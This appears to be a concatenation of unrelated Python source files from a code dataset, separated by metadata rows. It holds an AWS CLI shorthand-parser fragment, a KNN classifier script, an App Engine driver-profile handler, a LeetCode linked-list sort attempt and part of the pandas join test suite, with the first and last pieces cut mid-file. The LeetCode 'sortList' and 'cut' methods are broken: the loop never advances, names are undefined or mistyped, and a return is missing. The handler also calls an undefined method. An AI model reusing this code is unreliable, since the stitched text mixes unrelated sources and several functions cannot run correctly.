self._visitor.visit(parsed, cli_argument.argument_model)
except shorthand.ShorthandParseError as e:
raise ParamError(cli_argument.cli_name, str(e))
except (ParamError, ParamUnknownKeyError) as e:
# The shorthand parse methods don't have the cli_name,
# so any ParamError won't have this value. To accomodate
# this, ParamErrors are caught and reraised with the cli_name
# injected.
raise ParamError(cli_argument.cli_name, str(e))
return parsed
def _handle_special_cases(self, cli_argument, value, service_name,
operation_name):
# We need to handle a few special cases that the previous
# parser handled in order to stay backwards compatible.
model = cli_argument.argument_model
if model.type_name == 'list' and \
model.member.type_name == 'structure' and \
len(model.member.members) == 1 and \
self._uses_old_list_case(service_name, operation_name, cli_argument.name):
# First special case is handling a list of structures
# of a single element such as:
#
# --instance-ids id-1 id-2 id-3
#
# gets parsed as:
#
# [{"InstanceId": "id-1"}, {"InstanceId": "id-2"},
# {"InstanceId": "id-3"}]
key_name = list(model.member.members.keys())[0]
new_values = [{key_name: v} for v in value]
return new_values
elif model.type_name == 'structure' and \
len(model.members) == 1 and \
'Value' in model.members and \
model.members['Value'].type_name == 'string' and \
'=' not in value:
# Second special case is where a structure of a single
# value whose member name is "Value" can be specified
# as:
# --instance-terminate-behavior shutdown
#
# gets parsed as:
# {"Value": "shutdown"}
return {'Value': value}
def _should_parse_as_shorthand(self, cli_argument, value):
# We first need to make sure this is a parameter that qualifies
# for simplification. The first short-circuit case is if it looks
# like json we immediately return.
if value and isinstance(value, list):
check_val = value[0]
else:
check_val = value
if isinstance(check_val, six.string_types) and check_val.strip().startswith(
('[', '{')):
LOG.debug("Param %s looks like JSON, not considered for "
"param shorthand.", cli_argument.py_name)
return False
model = cli_argument.argument_model
# The second case is to make sure the argument is sufficiently
# complex, that is, it's base type is a complex type *and*
# if it's a list, then it can't be a list of scalar types.
return _is_complex_shape(model)
class ParamShorthandDocGen(ParamShorthand):
"""Documentation generator for param shorthand syntax."""
_DONT_DOC = object()
_MAX_STACK = 3
def supports_shorthand(self, argument_model):
"""Checks if a CLI argument supports shorthand syntax."""
if argument_model is not None:
return _is_complex_shape(argument_model)
return False
def generate_shorthand_example(self, cli_argument, service_name,
operation_name):
"""Generate documentation for a CLI argument.
:type cli_argument: awscli.arguments.BaseCLIArgument
:param cli_argument: The CLI argument which to generate
documentation for.
:return: Returns either a string or ``None``. If a string
is returned, it is the generated shorthand example.
If a value of ``None`` is returned then this indicates
that no shorthand syntax is available for the provided
``argument_model``.
"""
docstring = self._handle_special_cases(
cli_argument, service_name, operation_name)
if docstring is self._DONT_DOC:
return None
elif docstring:
return docstring
# Otherwise we fall back to the normal docgen for shorthand
# syntax.
stack = []
try:
if cli_argument.argument_model.type_name == 'list':
argument_model = cli_argument.argument_model.member
return self._shorthand_docs(argument_model, stack) + ' ...'
else:
return self._shorthand_docs(cli_argument.argument_model, stack)
except TooComplexError:
return ''
def _handle_special_cases(self, cli_argument, service_name, operation_name):
model = cli_argument.argument_model
if model.type_name == 'list' and \
model.member.type_name == 'structure' and \
len(model.member.members) == 1 and \
self._uses_old_list_case(
service_name, operation_name, cli_argument.name):
member_name = list(model.member.members)[0]
return '%s %s1 %s2 %s3' % (cli_argument.cli_name, member_name,
member_name, member_name)
elif model.type_name == 'structure' and \
len(model.members) == 1 and \
'Value' in model.members and \
model.members['Value'].type_name == 'string':
return self._DONT_DOC
return ''
def _shorthand_docs(self, argument_model, stack):
if len(stack) > self._MAX_STACK:
raise TooComplexError()
if argument_model.type_name == 'structure':
return self._structure_docs(argument_model, stack)
elif argument_model.type_name == 'list':
return self._list_docs(argument_model, stack)
elif argument_model.type_name == 'map':
return self._map_docs(argument_model, stack)
else:
return argument_model.type_name
def _list_docs(self, argument_model, stack):
list_member = argument_model.member
stack.append(list_member.name)
try:
element_docs = self._shorthand_docs(argument_model.member, stack)
finally:
stack.pop()
if list_member.type_name in COMPLEX_TYPES or len(stack) > 1:
return '[%s,%s]' % (element_docs, element_docs)
else:
return '%s,%s' % (element_docs, element_docs)
def _map_docs(self, argument_model, stack):
k = argument_model.key
value_docs = self._shorthand_docs(argument_model.value, stack)
start = 'KeyName1=%s,KeyName2=%s' % (value_docs, value_docs)
if k.enum and not stack:
start += '\n\nWhere valid key names are:\n'
for enum in k.enum:
start += ' %s\n' % enum
elif stack:
start = '{%s}' % start
return start
def _structure_docs(self, argument_model, stack):
parts = []
for name, member_shape in argument_model.members.items():
parts.append(self._member_docs(name, member_shape, stack))
inner_part = ','.join(parts)
if not stack:
return inner_part
return '{%s}' % inner_part
def _member_docs(self, name, shape, stack):
if stack.count(shape.name) > 0:
return '( ... recursive ... )'
stack.append(shape.name)
try:
value_doc = self._shorthand_docs(shape, stack)
finally:
stack.pop()
return '%s=%s' % (name, value_doc)
| [
"ahmed.nadim59@gmail.com"
] | ahmed.nadim59@gmail.com |
b1aa1154a111a4802c9c3e765a47373412a8820d | e52afdf311d9b682fd2edfa2ac131bd83bbe63eb | /Week 2/1-2/knn.py | 54420f3213ba04fc5bc1f0cd9f67980cd384cb91 | [] | no_license | YashwanthMN1/MLEdyoda | cc1185e4618e896764a0b01773a886e49ba9b8e7 | 36a9470729c57c7b6b742bac239e9352f8b2a133 | refs/heads/main | 2023-05-02T11:51:11.801693 | 2021-05-25T13:52:24 | 2021-05-25T13:52:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | # -*- coding: utf-8 -*-
"""
Created on Sun May 9 13:11:46 2021
@author: RISHBANS
"""
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2,3]].values
y = dataset.iloc[:, 4].values
X = X.astype(float)
y = y.astype(float)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
#https://machine-arena.blogspot.com/2020/04/standardscaler-why-fittransform-for.html
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
from sklearn.neighbors import KNeighborsClassifier
classifier = KNeighborsClassifier(n_neighbors = 11)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
cm = confusion_matrix(y_test, y_pred)
print(classification_report(y_test, y_pred, target_names=["yes", "no"]))
print(cm) | [
"rishibansal02@gmail.com"
] | rishibansal02@gmail.com |
2cd3388cd66000a0c14eee28eb57bb0be2033b95 | 6ccd833a6bc8eb2d7cadbaf64ba9351d87c8d1bd | /Handlers/User/Driver.py | db2b2045ecd5c5a92ae606173af52da3ffa7ed4a | [] | no_license | elaineo/barnacle-gae | e00691235160d140fb5004b34988d30811ef4102 | c706683cf448dc5763bb2ce8ea2f5968fcefb375 | refs/heads/master | 2021-01-01T03:47:28.083451 | 2014-11-18T16:47:42 | 2014-11-18T16:47:42 | 59,609,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | py | from Handlers.BaseHandler import *
from Models.ImageModel import *
from Models.User.Account import *
from Models.User.Driver import *
from Handlers.ImageHandler import *
from google.appengine.api import images
from google.appengine.api import users
import logging
import json
class DriverHandler(BaseHandler):
    """Handles driver-profile pages and form submissions.

    GET  /driver         -> driver signup form, or /route for existing drivers
    GET  /driver/<key>   -> public driver page
    POST /driver         -> create/update the driver profile
    POST /driver/photo   -> upload/replace the vehicle photo (JSON response)
    """

    def get(self, key=None):
        if not key:
            if not self.user_prefs:
                self.redirect('/#signin-box')
            else:
                self.__index()
        else:
            # NOTE(review): __public is not defined in this class; confirm it
            # is inherited/provided elsewhere, otherwise this branch raises.
            self.__public(key)

    def __index(self):
        """ User profile information page """
        self.params['createorupdate'] = 'Ready to Drive'
        d = Driver.by_userkey(self.user_prefs.key)
        self.params['driver'] = True
        if d:  # existing driver: skip the signup form
            self.redirect('/route')
            return
        # else first time being driver: pre-fill the form from the account
        self.params.update(self.user_prefs.params_fill())
        self.render('user/forms/filldriver.html', **self.params)

    def post(self, action=None):
        # If the user is not logged in, redirect to the login page, which will
        # redirect back here after sign-in.
        if not self.user_prefs:
            self.redirect('/#signin-box')
            # BUGFIX: redirect() does not stop execution; without this return
            # the profile/photo handlers below still ran for anonymous users.
            return
        if not action:
            self.__profile()
        elif action == 'photo':
            self.__updateimg()

    def __updateimg(self):
        """Create or replace the driver's vehicle image; respond with JSON."""
        img = self.request.get("file")
        if not img:
            # BUGFIX: previously nothing was written when no file was posted,
            # producing an empty 200 response; report the error explicitly.
            self.response.headers['Content-Type'] = "application/json"
            self.write(json.dumps({'status': 'error', 'msg': 'no image uploaded'}))
            return
        d = Driver.by_userkey(self.user_prefs.key)
        if d.img_id:  # existing image: overwrite the stored blob in place
            imgstore = ImageStore.get_by_id(d.img_id)
            imgstore.update(img)
        else:  # new image: store it and link its id to the driver record
            imgstore = ImageStore.new(img)
            imgstore.put()
            d.img_id = imgstore.key.id()
            d.put()
        self.response.headers['Content-Type'] = "application/json"
        response = {'status': 'ok', 'img_url': d.vehicle_image_url()}
        self.write(json.dumps(response))

    def __profile(self):
        """Update the account's profile fields from the posted driver form."""
        user_prefs = self.user_prefs
        user_prefs.first_name = self.request.get("first_name").capitalize()
        user_prefs.last_name = self.request.get("last_name")
        user_prefs.about = self.request.get("about").replace('\n', '')
        # validate
        location = self.request.get("loc")
        if location:
            user_prefs.location = location
        lat = self.request.get('startlat')
        lon = self.request.get('startlon')
        if lat and lon:
            user_prefs.locpt = ndb.GeoPt(lat, lon)
        # image upload (optional)
        img = self.request.get("file")
        if img:
            if user_prefs.img_id and user_prefs.img_id >= 0:  # existing image
                imgstore = ImageStore.get_by_id(user_prefs.img_id)
                imgstore.update(img)
            else:  # new image
                imgstore = ImageStore.new(img)
                imgstore.put()
                user_prefs.img_id = imgstore.key.id()
        user_prefs.put()
        logging.info('User turns into a driver')
        self.redirect(user_prefs.profile_url())
"elaine.ou@gmail.com"
] | elaine.ou@gmail.com |
33a624738cbd967c7805dc0b4eae16b9d1fecd8b | ba2dbc19e899faaa17b994a1224e455a3de5b9ad | /01_jump to python/CHAP07/2_Regular_Expression_Practice/q8.py | b16778f7c4b0ffa22de4f29cb9db0a0d2a3226d3 | [] | no_license | xsky21/bigdata2019 | 52d3dc9379a05ba794c53a28284de2168d0fc366 | 19464a6f8862b6e6e3d4e452e0dab85bdd954e40 | refs/heads/master | 2020-04-21T10:56:34.637812 | 2019-04-16T04:16:27 | 2019-04-16T04:16:27 | 169,503,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | # 숫자 0 혹은 알파벳 b 여러 개가 알파벳 a 뒤에오는 문자열을 찾는 파이썬 프로그램을 만들어라
import re
def matching(answer):
    """Search *answer* for one uppercase letter followed by one or more
    lowercase letters, and print the resulting match object (or None)."""
    match = re.search("[A-Z][a-z]+", answer)
    print(match)
matching("Azzzzz")
matching("AAaaaa")
matching("AA")
matching("abbb")
#여기선 b가 세 개일 때, b 세개를 출력해주지만. b2개를 출력시키고 싶다면 |를 써야된 | [
"studerande5@gmail.com"
] | studerande5@gmail.com |
445d03f9d2bd2d6754c4785b3446d88b3eddc2f4 | 699a43917ce75b2026a450f67d85731a0f719e01 | /using_python/148_sort_for_listNode.py | 8638dd3b7dfca07b44ec645edaf51ef5fb6dd872 | [] | no_license | wusanshou2017/Leetcode | 96ab81ae38d6e04739c071acfc0a5f46a1c9620b | c4b85ca0e23700b84e4a8a3a426ab634dba0fa88 | refs/heads/master | 2021-11-16T01:18:27.886085 | 2021-10-14T09:54:47 | 2021-10-14T09:54:47 | 107,402,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 768 | py | # Definition for singly-linked list.
class ListNode:
    """A node in a singly linked list: a value plus a pointer to the next node."""

    def __init__(self, val=0, next=None):
        self.val, self.next = val, next
class Solution:
    def sortList(self, head: ListNode) -> ListNode:
        """Attempt to sort the linked list in ascending order (LeetCode 148).

        NOTE(review): this implementation is broken and incomplete:
          - the loop never advances ``dummy``, so for any list with two or
            more nodes it spins forever on the first pair;
          - a single-node list returns ``[]`` (an empty Python list) rather
            than the head node or None;
          - ``head is None`` raises AttributeError on ``head.next``;
          - there is no final ``return``, so on (hypothetical) completion the
            method would return None instead of the sorted head.
        """
        if not head.next:
            return []
        pre = head.val
        dummy = head
        while dummy.next:
            pre = dummy.val
            cur = dummy.next.val
            if cur < pre:
                # Swap the two adjacent out-of-order values in place.
                dummy.val, dummy.next.val = cur, pre
    def cut(self, head: ListNode) -> ListNode:
        """Detach the list after its n-th node and return the remainder (broken).

        NOTE(review): this method cannot run as written:
          - ``P`` is assigned but the loop reads lowercase ``p`` (NameError);
          - ``n`` is never defined — it presumably should be a parameter;
          - ``ce.next = None`` severs the tail after its *first* node, so at
            most one node would be returned; the usual pattern sets
            ``p.next = None`` instead — confirm the intended semantics.
        """
        P = head
        while (n - 1) and p:
            p = p.next
            n -= 1
        if not p:
            return None
        ce = p.next
        ce.next = None
        return ce
def merge(seq1, seq2):
dummy = ListNode()
| [
"252652905@qq.com"
] | 252652905@qq.com |
c2cfa7dbfec1bae1baa2995125e12cacf16d1d4b | fab215713c1b72974a0dc7db73a20e4b5abefe4a | /简明python教程/data-structure/tuple/using_tuple.py | d8e928575aac20cd564ebf278957b92d0c8a5898 | [] | no_license | cwdgit/learn-python | e6774dcea506cfa461bfccc001205bf75a1d126b | c5ba97a917bd2b8d7b767ce704ca5ff441b9dfee | refs/heads/master | 2020-03-24T16:41:47.837953 | 2018-08-23T03:13:04 | 2018-08-23T03:13:04 | 142,832,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | #!/usr/bin/python
#filename: using_tuple.py
# Demonstrates basic tuple usage (Python 2 print-statement syntax).
zoo=('wolf','elephant','penguin')
print zoo
print 'number of animals in the zoo is', len(zoo)
# Tuples can nest: new_zoo holds the entire old zoo tuple as one element.
new_zoo=('monkey','dolphin',zoo)
# NOTE(review): the label still says "the zoo" but this counts new_zoo, and
# the nested tuple counts as a single element (prints 3) — confirm whether
# the tutorial intends this.
print 'number of animals in the zoo is ', len(new_zoo)
print 'all animals in new zoo are',new_zoo
# new_zoo[2] is the original zoo tuple; double indexing reaches inside it.
print 'animals brought from old zoo are ' ,new_zoo[2]
print 'last animal brought from old zoo is ', new_zoo[2][2]
| [
"you@example.com"
] | you@example.com |
9a85a83020da95c6010ac99ac447040d1f4c93d9 | 1ab7b3f2aa63de8488ce7c466a67d367771aa1f2 | /Ricardo_OS/Python_backend/venv/lib/python3.8/site-packages/pandas/tests/reshape/merge/test_join.py | c33443e24b268ece2c4113b751a2b5b8929e7c99 | [
"MIT"
] | permissive | icl-rocketry/Avionics | 9d39aeb11aba11115826fd73357b415026a7adad | 95b7a061eabd6f2b607fba79e007186030f02720 | refs/heads/master | 2022-07-30T07:54:10.642930 | 2022-07-10T12:19:10 | 2022-07-10T12:19:10 | 216,184,670 | 9 | 1 | MIT | 2022-06-27T10:17:06 | 2019-10-19T09:57:07 | C++ | UTF-8 | Python | false | false | 31,165 | py | import numpy as np
from numpy.random import randn
import pytest
from pandas._libs import join as libjoin
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, Series, concat, merge
import pandas._testing as tm
from pandas.tests.reshape.merge.test_merge import NGROUPS, N, get_test_data
a_ = np.array
class TestJoin:
    def setup_method(self, method):
        """Build the fixture frames shared by the join tests.

        - ``self.df`` / ``self.df2``: frames with overlapping ``key1``/``key2``
          columns and random data columns; ``df2`` is a fifth of the size (and
          uses half the key groups), so the key sets only partially overlap.
        - ``self.target`` / ``self.source``: a mixed-dtype frame plus a frame
          indexed by ``target['C']``'s values, for ``join(..., on='C')`` tests.
        """
        # aggregate multiple columns
        self.df = DataFrame(
            {
                "key1": get_test_data(),
                "key2": get_test_data(),
                "data1": np.random.randn(N),
                "data2": np.random.randn(N),
            }
        )

        # exclude a couple keys for fun
        self.df = self.df[self.df["key2"] > 1]

        self.df2 = DataFrame(
            {
                "key1": get_test_data(n=N // 5),
                "key2": get_test_data(ngroups=NGROUPS // 2, n=N // 5),
                "value": np.random.randn(N // 5),
            }
        )

        index, data = tm.getMixedTypeDict()
        self.target = DataFrame(data, index=index)

        # Join on string value
        self.source = DataFrame(
            {"MergedA": data["A"], "MergedD": data["D"]}, index=data["C"]
        )
def test_cython_left_outer_join(self):
left = a_([0, 1, 2, 1, 2, 0, 0, 1, 2, 3, 3], dtype=np.int64)
right = a_([1, 1, 0, 4, 2, 2, 1], dtype=np.int64)
max_group = 5
ls, rs = libjoin.left_outer_join(left, right, max_group)
exp_ls = left.argsort(kind="mergesort")
exp_rs = right.argsort(kind="mergesort")
exp_li = a_([0, 1, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 7, 7, 8, 8, 9, 10])
exp_ri = a_([0, 0, 0, 1, 2, 3, 1, 2, 3, 1, 2, 3, 4, 5, 4, 5, 4, 5, -1, -1])
exp_ls = exp_ls.take(exp_li)
exp_ls[exp_li == -1] = -1
exp_rs = exp_rs.take(exp_ri)
exp_rs[exp_ri == -1] = -1
tm.assert_numpy_array_equal(ls, exp_ls, check_dtype=False)
tm.assert_numpy_array_equal(rs, exp_rs, check_dtype=False)
def test_cython_right_outer_join(self):
left = a_([0, 1, 2, 1, 2, 0, 0, 1, 2, 3, 3], dtype=np.int64)
right = a_([1, 1, 0, 4, 2, 2, 1], dtype=np.int64)
max_group = 5
rs, ls = libjoin.left_outer_join(right, left, max_group)
exp_ls = left.argsort(kind="mergesort")
exp_rs = right.argsort(kind="mergesort")
# 0 1 1 1
exp_li = a_(
[
0,
1,
2,
3,
4,
5,
3,
4,
5,
3,
4,
5,
# 2 2 4
6,
7,
8,
6,
7,
8,
-1,
]
)
exp_ri = a_([0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6])
exp_ls = exp_ls.take(exp_li)
exp_ls[exp_li == -1] = -1
exp_rs = exp_rs.take(exp_ri)
exp_rs[exp_ri == -1] = -1
tm.assert_numpy_array_equal(ls, exp_ls, check_dtype=False)
tm.assert_numpy_array_equal(rs, exp_rs, check_dtype=False)
def test_cython_inner_join(self):
left = a_([0, 1, 2, 1, 2, 0, 0, 1, 2, 3, 3], dtype=np.int64)
right = a_([1, 1, 0, 4, 2, 2, 1, 4], dtype=np.int64)
max_group = 5
ls, rs = libjoin.inner_join(left, right, max_group)
exp_ls = left.argsort(kind="mergesort")
exp_rs = right.argsort(kind="mergesort")
exp_li = a_([0, 1, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 7, 7, 8, 8])
exp_ri = a_([0, 0, 0, 1, 2, 3, 1, 2, 3, 1, 2, 3, 4, 5, 4, 5, 4, 5])
exp_ls = exp_ls.take(exp_li)
exp_ls[exp_li == -1] = -1
exp_rs = exp_rs.take(exp_ri)
exp_rs[exp_ri == -1] = -1
tm.assert_numpy_array_equal(ls, exp_ls, check_dtype=False)
tm.assert_numpy_array_equal(rs, exp_rs, check_dtype=False)
def test_left_outer_join(self):
joined_key2 = merge(self.df, self.df2, on="key2")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="left")
joined_both = merge(self.df, self.df2)
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="left")
def test_right_outer_join(self):
joined_key2 = merge(self.df, self.df2, on="key2", how="right")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="right")
joined_both = merge(self.df, self.df2, how="right")
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="right")
def test_full_outer_join(self):
joined_key2 = merge(self.df, self.df2, on="key2", how="outer")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="outer")
joined_both = merge(self.df, self.df2, how="outer")
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="outer")
def test_inner_join(self):
joined_key2 = merge(self.df, self.df2, on="key2", how="inner")
_check_join(self.df, self.df2, joined_key2, ["key2"], how="inner")
joined_both = merge(self.df, self.df2, how="inner")
_check_join(self.df, self.df2, joined_both, ["key1", "key2"], how="inner")
def test_handle_overlap(self):
joined = merge(self.df, self.df2, on="key2", suffixes=(".foo", ".bar"))
assert "key1.foo" in joined
assert "key1.bar" in joined
def test_handle_overlap_arbitrary_key(self):
joined = merge(
self.df,
self.df2,
left_on="key2",
right_on="key1",
suffixes=(".foo", ".bar"),
)
assert "key1.foo" in joined
assert "key2.bar" in joined
def test_join_on(self):
target = self.target
source = self.source
merged = target.join(source, on="C")
tm.assert_series_equal(merged["MergedA"], target["A"], check_names=False)
tm.assert_series_equal(merged["MergedD"], target["D"], check_names=False)
# join with duplicates (fix regression from DataFrame/Matrix merge)
df = DataFrame({"key": ["a", "a", "b", "b", "c"]})
df2 = DataFrame({"value": [0, 1, 2]}, index=["a", "b", "c"])
joined = df.join(df2, on="key")
expected = DataFrame(
{"key": ["a", "a", "b", "b", "c"], "value": [0, 0, 1, 1, 2]}
)
tm.assert_frame_equal(joined, expected)
# Test when some are missing
df_a = DataFrame([[1], [2], [3]], index=["a", "b", "c"], columns=["one"])
df_b = DataFrame([["foo"], ["bar"]], index=[1, 2], columns=["two"])
df_c = DataFrame([[1], [2]], index=[1, 2], columns=["three"])
joined = df_a.join(df_b, on="one")
joined = joined.join(df_c, on="one")
assert np.isnan(joined["two"]["c"])
assert np.isnan(joined["three"]["c"])
# merge column not p resent
with pytest.raises(KeyError, match="^'E'$"):
target.join(source, on="E")
# overlap
source_copy = source.copy()
source_copy["A"] = 0
msg = (
"You are trying to merge on float64 and object columns. If "
"you wish to proceed you should use pd.concat"
)
with pytest.raises(ValueError, match=msg):
target.join(source_copy, on="A")
def test_join_on_fails_with_different_right_index(self):
df = DataFrame(
{"a": np.random.choice(["m", "f"], size=3), "b": np.random.randn(3)}
)
df2 = DataFrame(
{"a": np.random.choice(["m", "f"], size=10), "b": np.random.randn(10)},
index=tm.makeCustomIndex(10, 2),
)
msg = r'len\(left_on\) must equal the number of levels in the index of "right"'
with pytest.raises(ValueError, match=msg):
merge(df, df2, left_on="a", right_index=True)
def test_join_on_fails_with_different_left_index(self):
df = DataFrame(
{"a": np.random.choice(["m", "f"], size=3), "b": np.random.randn(3)},
index=tm.makeCustomIndex(3, 2),
)
df2 = DataFrame(
{"a": np.random.choice(["m", "f"], size=10), "b": np.random.randn(10)}
)
msg = r'len\(right_on\) must equal the number of levels in the index of "left"'
with pytest.raises(ValueError, match=msg):
merge(df, df2, right_on="b", left_index=True)
def test_join_on_fails_with_different_column_counts(self):
df = DataFrame(
{"a": np.random.choice(["m", "f"], size=3), "b": np.random.randn(3)}
)
df2 = DataFrame(
{"a": np.random.choice(["m", "f"], size=10), "b": np.random.randn(10)},
index=tm.makeCustomIndex(10, 2),
)
msg = r"len\(right_on\) must equal len\(left_on\)"
with pytest.raises(ValueError, match=msg):
merge(df, df2, right_on="a", left_on=["a", "b"])
@pytest.mark.parametrize("wrong_type", [2, "str", None, np.array([0, 1])])
def test_join_on_fails_with_wrong_object_type(self, wrong_type):
# GH12081 - original issue
# GH21220 - merging of Series and DataFrame is now allowed
# Edited test to remove the Series object from test parameters
df = DataFrame({"a": [1, 1]})
msg = (
"Can only merge Series or DataFrame objects, "
f"a {type(wrong_type)} was passed"
)
with pytest.raises(TypeError, match=msg):
merge(wrong_type, df, left_on="a", right_on="a")
with pytest.raises(TypeError, match=msg):
merge(df, wrong_type, left_on="a", right_on="a")
def test_join_on_pass_vector(self):
expected = self.target.join(self.source, on="C")
del expected["C"]
join_col = self.target.pop("C")
result = self.target.join(self.source, on=join_col)
tm.assert_frame_equal(result, expected)
def test_join_with_len0(self):
# nothing to merge
merged = self.target.join(self.source.reindex([]), on="C")
for col in self.source:
assert col in merged
assert merged[col].isna().all()
merged2 = self.target.join(self.source.reindex([]), on="C", how="inner")
tm.assert_index_equal(merged2.columns, merged.columns)
assert len(merged2) == 0
def test_join_on_inner(self):
df = DataFrame({"key": ["a", "a", "d", "b", "b", "c"]})
df2 = DataFrame({"value": [0, 1]}, index=["a", "b"])
joined = df.join(df2, on="key", how="inner")
expected = df.join(df2, on="key")
expected = expected[expected["value"].notna()]
tm.assert_series_equal(joined["key"], expected["key"])
tm.assert_series_equal(joined["value"], expected["value"], check_dtype=False)
tm.assert_index_equal(joined.index, expected.index)
def test_join_on_singlekey_list(self):
df = DataFrame({"key": ["a", "a", "b", "b", "c"]})
df2 = DataFrame({"value": [0, 1, 2]}, index=["a", "b", "c"])
# corner cases
joined = df.join(df2, on=["key"])
expected = df.join(df2, on="key")
tm.assert_frame_equal(joined, expected)
def test_join_on_series(self):
result = self.target.join(self.source["MergedA"], on="C")
expected = self.target.join(self.source[["MergedA"]], on="C")
tm.assert_frame_equal(result, expected)
def test_join_on_series_buglet(self):
# GH #638
df = DataFrame({"a": [1, 1]})
ds = Series([2], index=[1], name="b")
result = df.join(ds, on="a")
expected = DataFrame({"a": [1, 1], "b": [2, 2]}, index=df.index)
tm.assert_frame_equal(result, expected)
def test_join_index_mixed(self, join_type):
# no overlapping blocks
df1 = DataFrame(index=np.arange(10))
df1["bool"] = True
df1["string"] = "foo"
df2 = DataFrame(index=np.arange(5, 15))
df2["int"] = 1
df2["float"] = 1.0
joined = df1.join(df2, how=join_type)
expected = _join_by_hand(df1, df2, how=join_type)
tm.assert_frame_equal(joined, expected)
joined = df2.join(df1, how=join_type)
expected = _join_by_hand(df2, df1, how=join_type)
tm.assert_frame_equal(joined, expected)
def test_join_index_mixed_overlap(self):
df1 = DataFrame(
{"A": 1.0, "B": 2, "C": "foo", "D": True},
index=np.arange(10),
columns=["A", "B", "C", "D"],
)
assert df1["B"].dtype == np.int64
assert df1["D"].dtype == np.bool_
df2 = DataFrame(
{"A": 1.0, "B": 2, "C": "foo", "D": True},
index=np.arange(0, 10, 2),
columns=["A", "B", "C", "D"],
)
# overlap
joined = df1.join(df2, lsuffix="_one", rsuffix="_two")
expected_columns = [
"A_one",
"B_one",
"C_one",
"D_one",
"A_two",
"B_two",
"C_two",
"D_two",
]
df1.columns = expected_columns[:4]
df2.columns = expected_columns[4:]
expected = _join_by_hand(df1, df2)
tm.assert_frame_equal(joined, expected)
def test_join_empty_bug(self):
# generated an exception in 0.4.3
x = DataFrame()
x.join(DataFrame([3], index=[0], columns=["A"]), how="outer")
def test_join_unconsolidated(self):
# GH #331
a = DataFrame(randn(30, 2), columns=["a", "b"])
c = Series(randn(30))
a["c"] = c
d = DataFrame(randn(30, 1), columns=["q"])
# it works!
a.join(d)
d.join(a)
def test_join_multiindex(self):
index1 = MultiIndex.from_arrays(
[["a", "a", "a", "b", "b", "b"], [1, 2, 3, 1, 2, 3]],
names=["first", "second"],
)
index2 = MultiIndex.from_arrays(
[["b", "b", "b", "c", "c", "c"], [1, 2, 3, 1, 2, 3]],
names=["first", "second"],
)
df1 = DataFrame(data=np.random.randn(6), index=index1, columns=["var X"])
df2 = DataFrame(data=np.random.randn(6), index=index2, columns=["var Y"])
df1 = df1.sort_index(level=0)
df2 = df2.sort_index(level=0)
joined = df1.join(df2, how="outer")
ex_index = Index(index1.values).union(Index(index2.values))
expected = df1.reindex(ex_index).join(df2.reindex(ex_index))
expected.index.names = index1.names
tm.assert_frame_equal(joined, expected)
assert joined.index.names == index1.names
df1 = df1.sort_index(level=1)
df2 = df2.sort_index(level=1)
joined = df1.join(df2, how="outer").sort_index(level=0)
ex_index = Index(index1.values).union(Index(index2.values))
expected = df1.reindex(ex_index).join(df2.reindex(ex_index))
expected.index.names = index1.names
tm.assert_frame_equal(joined, expected)
assert joined.index.names == index1.names
def test_join_inner_multiindex(self):
key1 = ["bar", "bar", "bar", "foo", "foo", "baz", "baz", "qux", "qux", "snap"]
key2 = [
"two",
"one",
"three",
"one",
"two",
"one",
"two",
"two",
"three",
"one",
]
data = np.random.randn(len(key1))
data = DataFrame({"key1": key1, "key2": key2, "data": data})
index = MultiIndex(
levels=[["foo", "bar", "baz", "qux"], ["one", "two", "three"]],
codes=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3], [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=["first", "second"],
)
to_join = DataFrame(
np.random.randn(10, 3), index=index, columns=["j_one", "j_two", "j_three"]
)
joined = data.join(to_join, on=["key1", "key2"], how="inner")
expected = merge(
data,
to_join.reset_index(),
left_on=["key1", "key2"],
right_on=["first", "second"],
how="inner",
sort=False,
)
expected2 = merge(
to_join,
data,
right_on=["key1", "key2"],
left_index=True,
how="inner",
sort=False,
)
tm.assert_frame_equal(joined, expected2.reindex_like(joined))
expected2 = merge(
to_join,
data,
right_on=["key1", "key2"],
left_index=True,
how="inner",
sort=False,
)
expected = expected.drop(["first", "second"], axis=1)
expected.index = joined.index
assert joined.index.is_monotonic
tm.assert_frame_equal(joined, expected)
# _assert_same_contents(expected, expected2.loc[:, expected.columns])
def test_join_hierarchical_mixed(self):
# GH 2024
df = DataFrame([(1, 2, 3), (4, 5, 6)], columns=["a", "b", "c"])
new_df = df.groupby(["a"]).agg({"b": [np.mean, np.sum]})
other_df = DataFrame([(1, 2, 3), (7, 10, 6)], columns=["a", "b", "d"])
other_df.set_index("a", inplace=True)
# GH 9455, 12219
with tm.assert_produces_warning(UserWarning):
result = merge(new_df, other_df, left_index=True, right_index=True)
assert ("b", "mean") in result
assert "b" in result
def test_join_float64_float32(self):
a = DataFrame(randn(10, 2), columns=["a", "b"], dtype=np.float64)
b = DataFrame(randn(10, 1), columns=["c"], dtype=np.float32)
joined = a.join(b)
assert joined.dtypes["a"] == "float64"
assert joined.dtypes["b"] == "float64"
assert joined.dtypes["c"] == "float32"
a = np.random.randint(0, 5, 100).astype("int64")
b = np.random.random(100).astype("float64")
c = np.random.random(100).astype("float32")
